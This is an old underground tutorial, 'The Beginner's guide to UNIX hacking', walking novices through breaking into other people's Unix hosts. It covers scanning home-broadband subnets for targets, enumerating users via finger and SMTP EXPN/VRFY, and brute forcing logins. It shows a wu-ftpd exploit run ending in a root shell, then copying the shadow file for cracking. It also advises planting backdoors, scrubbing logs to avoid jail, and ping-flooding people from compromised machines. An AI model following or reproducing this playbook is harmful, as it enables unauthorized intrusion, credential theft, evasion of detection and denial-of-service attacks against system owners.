Beginners guide to unix hacking. Includes host enumeration, buffer overflows, firewalls, common mistakes, log cleaning, and more.
ea3139e78e2968521486618e39ab47156557263a1b247cf7ca40e4dfc47ca6c6
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\
+ |---\ - - ----- - /---\ /---\ |--- /--\ /--\ +
+ | | / \ / \ | / \ | | | \ \ +
+ |--/ | | | | | === /---\ | | |-- \_ \_ +
+ | \ | | | | | / \ | | | \ \ +
+ | \ \_/ \_/ | / \ \__/ \__/ |___ \__/ \__/ +
+ ====================================================================== +
+ +
+ /---\ |---\ |--- \ / +
+ | | | | \ / +
+ | |--/ |-- \ - / +
+ | | \ | \ / \ / +
+ \__/ | \ |___ \_/ \_/ +
\========================================================================/
...........................
...........................
.. ..
.. The Beginner's guide ..
.. to UNIX hacking ..
...........................
...........................
by: grim
,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,,..
Ok done with the sloppy ass ascii art. The reason I am
even writing this text is because of the incoming increase in questions like "how do I hack
hotmail" or aol or another lame question. This text should explain to you that you have to
actually know something to "hack." Read through the whole text if you are a beginner, and
if you know a little, skip through and you should understand it. I will probably be adding
to this text to make it include more info, and to make it easier to understand, the basic
reason I wrote this is to STOP people from asking me and others how to do STUPID things
yes it is STUPID to ask how to hack, it makes you look stupid and you will never be anything
unless you can't teach yourself.
I at first was just a kid in middle school who wanted to
mess up people's computers. I asked people about virii and trojans, and used them, I was a
lamer. I asked people in school and eventually found someone who was interested in hacking.
He showed me some tricks, and i payed him money i wanted to learn so bad. He had been using unix
for years, he told me to get a shell, I had no idea what he meant. He said it was access to
a unix computer. I was still a little confused, but eventually I got the hang of using a shell
instead of winshit. I read all I could, I spent all day on the computer, i started losing
interest in socialization in the real world. I didn't care, I spent over 12 hours a day on
the computer at that time, I read everything i could get a hold of, the very first text I
read was the "mostly harmless hacking" text. It interested me, I only used the windows stuff
at first like changing the shutdown screen and other simple things. I was making websites
on hacking although i didn't know what it was, I would include tools for windows like
trojans and virii although they weren't hacking it was something I liked at the time. I
later got into mailbombers, flooders, DoS things. After I learned all of that (I realize
that it is not hacking now don't flame me here) I started going back into getting shells.
Well at that time all the free shells I could find just plain sucked. I heard a couple
things about Linux. I asked my "hacker friend" at school, he said don't get Linux get a
real UNIX. He moved to PA, and I have never heard from him since, I have tryed to track him
down to thank him for what he has showed me but have had no luck. Well I got linux. The
install was text based then but it ran fast, it was a lot more reliable than windows,
never crashed. Well My 56k didn't work. I went on IRC and asked around #linux. I found
out I had a modem called a "winmodem", I win-modem is a modem controlled by the software.
They are generally slower than hardware modems and they don't work on linux. I played
around with the command line seeing what things I could do, than I eventually raised $100
to buy a Linux compatible modem. I got it running. It was great. I have been using it ever
since, and still am learning more about it. My parents say I am "addicted to the computer",
I try to convince them I am not. I never seem to get bored with it, I always have something
new to do with it. I have lost some friends in the time, hardly ever leaving my desk, I quit
the Varsity Football Team, I was a starter, I have quit jobs, all just to use this damn machine
I am starting to get pissed at myself so I will stop writing this boring paragraph. I hope someone
out there finds this useful :)
CONTENTS
============
(1.) Common knowledge
(2.) Supplies
(3.) Easy hacks
(4.) What you need to do to get in
(5.) Enumeration
(6.) Common Mistakes leading to compromise
(7.) Buffer overflows
(8.) Firewalls
(9.) What to do after getting in
(10.) How to not get caught
(11.) Log cleaning
(12.) Finding a use for the newly rooted box
(13.) My feelings on the bad hackers
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
DISCLAIMER
================
Ok by reading this text you agree to NOT hold me or anyone affiliated with r00t-access responsible
for your actions.
(1.) The best way to use this text is to read it once fully, than read
it again and try out some things explained here. Ok now on with the text.
When you read this text I am expecting you to have basic knowledge of what
telnet is, some basic tcp/ip knowledge... If there is something little here
you don't understand, don't hesitate to join #r00t-access on irc.dal.net,
that is one of the places I hang out on.
-------------------------------------------------------------------------------------------------------
SUPPLIES
==========
(2.) Here listed is some supplies you will need throughout this tutorial, they can be obtained
easily, at anti-secure.com and packetstorm.securify.com, just do a search for the names of the
tools I list.
1. - superscan (for windows)
2. - nmap (for unix)
3. - full shell access (the very best is if you have linux or bsd or solaris or another unix OS)
4. - compiler on the shell
5. - wingates (you can use them as telnet proxys)
That is it!
------------------------------------------------------------------------------------------------------
EASY TARGETS
==============
(3.) Here I talk about finding easy targets.
1. - go to altavista.com search for "games" make the language Japanese or another language
other than english, reason is these tend to be low on security
2. - Scan a Cable or DSL subnet for hosts with lots of services running, use nmap, make sure
when it finds an open port the state is "open" not "closed" or "filtered"
nmap's portscan report will tell you this, I will not explain how to use nmap since the
man page shows you enough
3. - make sure nmap is installed, use the command I post below or similar
to find hosts with lots of common unix services running-
(NOTE: $ will represent a regular user shell in this text and # will be representing a superuser
shell. I use 24.112.*.* as a sample, replace it with who you want to scan)
$ nmap -p 21,23 24.112.*.*
--------------------------------------------------------------------------------------------------
TO GET IN
============
(4.) To get in you will need to gather as much info on this host as you can, make sure it is
a dumb SysAdmin, since this is your first hack. Then exploit the System, I will explain more
on this and info getting later.
-------------------------------------------------------------------------------------------------
ENUMERATION
=============
(5,> Ok we have our target. Now to go further we need some info. First telnet to it's port 79, now
if this is open you can possibly gain a user list of who is logged on.Just telnet in and press enter.
Lets say it is enabled
and allows you to view online users. Look at the example below-
-----------------------------------------------------------------------------
$ telnet target.domain 79
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
Login Name Tty Idle Login Time Office Office Phone
gt grahm crackhead /1 Sep 1 12:01
-----------------------------------------------------------------------------
Ok if you get a login write it down
and try various logins for it. Maybe get Brutus, a telnet brute forcer which you can download for
windows at- www.packetstorm.securify.com. Use that, try many wordlists. If you just got a
"no one is logged on"
message than perhaps you should get "haktek" for windows, you can also get that at-
www.packetstorm.securify.com. Haktek will let you monitor the finger daemon for as long as you want
and log to a file everyone who logs in. This can be usefull. Another way is to use the sendmail.
If they have a lot of users try telneting in and trying to find some valid names, maybe even try
brute forcing it with a program or a shell script you could type up. Look below, I give an example
of a sendmail vulnerable to gathering valid logins-
-----------------------------------------------------------------------------
$ telnet target.domain 25
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
220 target.domain ESMTP Sendmail 8.9.3/8.9.3; Fri, 1 Sep 2000 12:11:00 -0400
expn wally
250 Wally Kolcun <wally@target.domain>
vrfy wally
250 Wally Kolcun <Wally@target.domain>
expn Billy
550 BIlly... User Unknown
----------------------------------------------------------------------------
As you see above I telneted to their smtp daemon, issued "expn <usernamehere>" and it told me if it was a
real user, then at the end I showed an example of what would happen if the user did not exist, when I
typed "expn Billy" it showed the user was unknown so it was not a valid login, this also helps you get
their email address when you would do some social engineering.
Another way of gathering usernames would be to search usenet, altavista, for that specific domain.
If you search newsgroups for the domain, there may be some useful info on it, like a problem they are having
maybe with setting permissions, which could get you in possibly.
Other daemons to help you could be systat, netstat...
Telnet can also help you figure out the OS, which can be important if you want to exploit it, some have the
OS printed in the telnet login, like below:
----------------------------------------------------------------------------
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
Red Hat Linux release 6.1 (Cartman)
Kernal 2.2.12-20 on an i586
login:
.----------------------------------------------------------------------------
As you can see above the system we are cracking now is a redhat 6.1 box
Social engineering can also get you somewhere, take the example of Kevin Mitnick, He used social engineering
to get into Novell, a HUGE system. What he did was talked like he knew someone who was working there. He
knew they were at vacation at the time, but he had their name. He called up Novell's offices and asked for
the person, the secretary said she was on vacation, so he said he needed to get access from her, he was
supposed to have. She gave him info that got him in.
----------------------------------------------------------------------------------------------------------
COMMON FLAWS
===============
(6.) Sometimes people make mistakes. This can get you in. Some people just aren't good sysadmins. A very
common flaw is people having trouble setting permissions, some have so much trouble they set things
writable to everyone. This can be trouble. Lets have an example here. Someone sets the cron.daily
writable for everyone. You could just upload somebackdoor and have it executed by the cron daemon which
would escalate your access to the system.
Now I will tell you about the most terrible thing to do. If a user ever uses IRC on the system, and
if they also had dcc file send on autoexcept, also having the files go to their home directory, they
could be sent a hacked up .bash_profile, if written correctly this could make them do something not
wanted. Like adding a user when they logged in, or mailing someone a login/pass. This is absolutely
the easiest way to get in.
---------------------------------------------------------------------------------------------------------
BUFFER OVERFLOWS/EXPLOITING
================================
(7.) I am not going into buffer overflows too deep. I will just explain what they are so you understand
and go into the next section.
BUFFER OVERFLOWS- On daemons there is a thing called a buffer limit. The buffer limit limits the
================== amount of bytes that come in. Sometimes by issuing specific code you ca overflow
the buffer and spawn a root shell or regular user shell. An example of this is
the recent Buffer overflow in wu-ftpd 2.6.0 (1). Below I will show you it-
------------------------------------------------------------------------------
$ gcc wuftpd-god.c -o wuftpd-god
$ ./wuftpd-god -h
Usage: ./wuftpd-god -t <target> [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]
[-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]
target : host with any wuftpd
user : anonymous user
dir : if not anonymous user, you need to have writable directory
magic_str : magic string (see exploit description)
-g : enables magic string digging
-x : enables test mode
pass_addr : pointer to setproctitle argument
ret_addr : this is pointer to shellcode
systypes:
0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm
2 - SuSe 6.3 with wuftpd 2.6.0(1) from rpm
3 - SuSe 6.4 with wuftpd 2.6.0(1) from rpm
4 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)
5 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports
* 6 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages
7 - FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports
8 - FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages
$ ./wuftpd-god -s0 -t target.domain
Target: target.domain (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
[32mUSER ftp
[0m331 Guest login ok, send your complete e-mail address as password.
[32mPASS <shellcode>
[0m230-Next time please use your e-mail address as your password
230- for example: joe@cc456375-b.abdn1.md.home.com
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
Linux melmac 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
#
-------------------------------------------------------------------------------
If you want root generally an exploit is the way. Find the OS of the system
then visit hack.co.za or packetstorm and search for that os, exploit and you
should get some perl scripts/c scripts/shell scripts. Then just execute them
as directed and you should have root.
-------------------------------------------------------------------------------
Already got a root shell, that was pretty easy. Just 3 commands to compile get help
and execute, a lot of times I think it is too easy.
Ok, in some places you might want to know the actual root password in case they patch the exploit.
so lets say you have a root shell. Issue the command as below-
(it is /etc/passwd if they did not install shadowing utils)
---------------------------------------------------------------
# cat /etc/shadow > /root/passwd
root:34jk3h4jh3.,;8363:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
sympa:x:89:89:Sympa Mailing list manager:/home/sympa:/bin/bash
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:103:X Font Server:/etc/X11/fs:/bin/false
fax:x:10:14:Fax Master:/home/fax/:/bin/bash
postfix:x:101:233:postfix:/var/spool/postfix:
gdm:x:42:235::/home/gdm:/bin/bash
grim:9hu.u8:501:501:grim:/home/grim:/bin/bash
banal:x:102:236:BANAL Administrator:/home/banal:/bin/bash
bleeb:36.34/363;86:502:506::/home/bleeb:/bin/bash
---------------------------------------------------------------
The above command saved it as /root/passwd, but then you must crack it. Use john the ripper,
it can be found at packetstorm and other places, I use it, it is so fast. Sometimes it takes years
to crack a password so I don't suggest relying on cracking
---------------------------------------------------------------------------------------------------------
FIREWALLS
===========
(8.) Firewalls can't stop you if you know what you are doing. In this text I use nmap a lot, it is good
for just about everything, nmap is short for network mapper. The newest version can be downloaded
from www.insecure.org I love it's OS detection, it is so accurate, even wehn little services are
running, it analyzes the tcp fingerprint, which it has a large database of. Ok enough on the greatness
here is a simple option on nmap you can use to find the rules for firewalls. Issue "nmap -sA" . This
Will check the firewalls rules. I don't want to go to deep into it to make this text extremely more
boring than it is. If you would like to know more on this flag for nmap (a - in front of a option
is a flag) just do "man nmap" at the shell prompt.
---------------------------------------------------------------------------------------------------------
WHAT TO DO AFTER GETTING IN
==============================
(9.) What to do after you get in depends on how you are going to use the system, if you want to use it
to have an anonymous root shell then set up a backdoor. You can get backdoor's (trojans) at
www.packetstorm.securify.com. I think you should be able to set up a backdoor on your own, but
if for some reason you need help join #r00t-access on Dalnet and I can get you through but I will
NOT crack into the systems for you, but I can help out occasionally if you need to secure your system...
---------------------------------------------------------------------------------------------------------
HOW TO NOT GET CAUGHT
=======================
(10.) Main thing is, DON'T be STUPID. If you want to keep the remote shell, don't deface the site, don't
delete their files, try to leave the system as it was and delete the neccessary logs to do so, that
is all I have to say on this section.
---------------------------------------------------------------------------------------------------------
LOG CLEANING
================
(11.) Log cleaning is the most important part of staying there and not going to jail. Rid your login/hostname
from logs, which on Linux are held in /var/log, and .bash_profile in your directory. The easiest way
to do this is to use a log cleaner which you can get from blackcode.com or packetstorm.
---------------------------------------------------------------------------------------------------------
FINDING A USE
===============
(12.) I always have at least one rooted shell on me. I set up nmap and saint on them to hide my hostname,
maybe run a web proxy/bnc on it. Saint is a great tool, it can tell you what a system is vulnerable
to and can run remotely in your webbrowser with ease. Sometimes when people piss me off I decide to use
a couple boxes and flood em'. like this-
----------------------------------------------------------------
# ping -f -c 50 -s 4500 IPaddress
.........................................................
...........................................................
.........E...........E...EE........E..................E.......
..............E.......E.EEE...................E.E......
Host unreatchable.
----------------------------------------------------------------
People consider it lame but sometimes i want certain people to just shutup on IRC so I flood them.
---------------------------------------------------------------------------------------------------------
THE BAD HACKER
===================
(13.) In this text I have not been talking of hacking, in fact it is refered to as cracking. I don't mess
up and systems and probably never will, not because I can't but because it is not right, plus if you got
caught you would get more jail time for damage charges. I dislike people into totalling things.
----------------------------------------------------------------------------------------------------------
FINALLY I am fucking done. Ok below you can contact me for comments or questions, if you have questions
please don't email me how to hack questions, join the chan, but be specific about your questions, I will
be putting up a telnet BBS soon, join the chan for updates in the topic.
CONTACT
==============
AIM: mrflemmingsuck
----
AOL (yes i have actually been known to use it at times for windows): zor0d
--------------------------------------------------------------------
email: grimR@antisecure.com or grim@r00taccess.dhs.org
------
IRC: irc.dal.net #r00t-access #zerosignal #bios and others...
----
ICQ: 54566262
----
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This text was by grimR, you are free to use this on your site and feel free to distribute it, just make
sure you leave it as is and keep the credit to me :)